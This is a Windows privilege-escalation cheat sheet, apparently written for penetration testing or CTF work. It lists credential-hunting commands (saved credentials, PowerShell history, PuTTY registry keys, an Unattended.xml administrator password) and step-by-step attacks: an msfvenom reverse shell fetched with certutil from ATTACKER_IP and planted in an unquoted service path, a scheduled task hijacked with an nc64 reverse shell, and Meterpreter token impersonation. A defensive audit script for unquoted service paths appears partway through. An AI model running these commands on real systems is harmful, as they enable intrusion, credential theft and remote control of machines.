Privesc Checklist
powershell -c "Get-Service"
  List services.
Get-ScheduledTask
  List scheduled tasks.
cmdkey /list
  List saved credentials (the password itself is not shown).
runas /savecred /user:admin powershell.exe
  Run a program with the saved credentials.
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  Show PowerShell history (from a CMD prompt).
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  Show PowerShell history (from a PowerShell prompt).
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
  Search for a database password in the IIS config.
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
  Look for PuTTY credentials in the registry (SimonTatham is PuTTY's creator).
Automated Scripts
POWERUP
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks
EXPLOIT-SUGGESTER
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
On target
systeminfo
On attacker machine
pip install xlrd==1.2.0
windows-exploit-suggester.py --update
windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DATE]-mssb.xls
WINPEAS
https://github.com/carlospolop/PEASS-ng/releases
winPEASx64.exe
  Run winPEAS.
WINPEAS Output
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected YOU CAN MODIFY THIS SERVICE: AllAccess
On attacker machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o Wise.exe
  Create a reverse shell named after the modifiable service.
nc -lvnp [ATTACKER_PORT]
  Open a listener.
On target machine
cd "C:\Program Files (x86)\Wise"
certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/Wise.exe Wise.exe
  Download the crafted executable and place it at the point in the vulnerable path where the space is.
sc.exe stop WiseBootAssistant
sc.exe query WiseBootAssistant
sc.exe start WiseBootAssistant
  Restart the service so that it executes the crafted binary.
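As an added defensive check (not part of the original checklist), the following PowerShell audit finds every service in the state winPEAS flags above ("No quotes and Space detected"), lists the intermediate paths the service control manager would try before the real binary (the locations an administrator must confirm are not writable by unprivileged users), and can quote the path in place. The function names are my own and it assumes an elevated PowerShell session on the host being audited.

```powershell
# Added example, not part of the original checklist: audit services for the
# "No quotes and Space detected" condition winPEAS reports, show the intermediate
# paths the SCM would try before the real binary, and quote the path in place.
# Function names are hypothetical; assumes an elevated PowerShell session.

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $raw = $_.PathName
        # Already-quoted or empty paths are not affected.
        if ([string]::IsNullOrWhiteSpace($raw) -or $raw.StartsWith('"')) { return }
        # Separate the executable (up to the first ".exe") from its arguments.
        $m = [regex]::Match($raw, '^(?<exe>.+?\.exe)(?<args>.*)$', 'IgnoreCase')
        if (-not $m.Success) { return }
        $exe = $m.Groups['exe'].Value
        if ($exe -notmatch ' ') { return }

        # Each prefix ending before a space is tried first; CreateProcess appends
        # ".exe" when the prefix's last path segment has no extension.
        $candidates = foreach ($idx in (0..($exe.Length - 1) | Where-Object { $exe[$_] -eq ' ' })) {
            $prefix = $exe.Substring(0, $idx)
            if ($prefix -notmatch '\.[^\\]*$') { $prefix += '.exe' }
            $prefix
        }

        [pscustomobject]@{
            Name       = $_.Name
            StartMode  = $_.StartMode
            State      = $_.State
            PathName   = $raw
            Candidates = $candidates
            FixedPath  = '"{0}"{1}' -f $exe, $m.Groups['args'].Value
        }
    }
}

function Repair-UnquotedServicePath {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$FixedPath
    )
    # Same effect as: sc.exe config <Name> binPath= "<FixedPath>"
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Name" -Name ImagePath -Value $FixedPath
}

# Report first; remediate only after confirming each entry is a genuine service binary.
$findings = Get-UnquotedServicePath
$findings | Format-List Name, StartMode, State, PathName, Candidates, FixedPath
# foreach ($f in $findings) { Repair-UnquotedServicePath -Name $f.Name -FixedPath $f.FixedPath }
```

For the winPEAS finding above, the Candidates column would list C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Wise\Wise.exe and C:\Program Files (x86)\Wise\Wise Care.exe, which is why write access to C:\Program Files (x86)\Wise matters.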
PRIVESCHECK
https://github.com/itm4n/PrivescCheck
Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1
Invoke-PrivescCheck
ROADRECON (Azure AD)
https://github.com/dirkjanm/ROADtools/wiki/Getting-started-with-ROADrecon
Abusing Schtasks
Show Schtasks
schtasks /query /tn vulnerableTask /fo list /v
  Show detailed information about the scheduled task.
cd c:\Program Files (x86)\SystemScheduler\Events
type [ID].INI_LOG.txt
  Show the task logs.
Replace executable
mv executedByTask.exe executedByTask.exe.bak
mv msfvenomReverseShell executedByTask.exe
  Replace the executable run by the scheduled task.
Inject scheduled task
echo c:\tools\nc64.exe -e cmd.exe [ATTACKER_IP] [ATTACKER_PORT] > C:\tasks\schtask.bat
  Inject a reverse shell into the batch file run by the scheduled task.
Abusing Privileges
Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
whoami /priv
  Show the current user's privileges.
SeDebugPrivilege and SeImpersonatePrivilege
When SeDebugPrivilege and SeImpersonatePrivilege are enabled, we can impersonate another user's token.
load incognito
list_tokens -g
  List the available group tokens (Meterpreter incognito extension).
impersonate_token "BUILTIN\Administrators"
  Impersonate the token.
To determine rights, Windows uses the primary token of the process, not the impersonated token, so we have to migrate to a process that already has the correct permissions.
The safest one to pick is services.exe.
migrate 668
  Migrate to process 668 (the PID of services.exe in this example).
Unattended Path
Unattended Setup is the method by which OEMs (Original Equipment Manufacturers) install Windows NT in unattended mode. C:\Windows\Panther\Unattend\Unattended.xml is where the users' passwords are stored, base64-encoded.
type C:\Windows\Panther\Unattend\Unattended.xml
  Display the unattended password.
<AutoLogon>
    <Password>
        <Value>dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Administrator</Username>
</AutoLogon>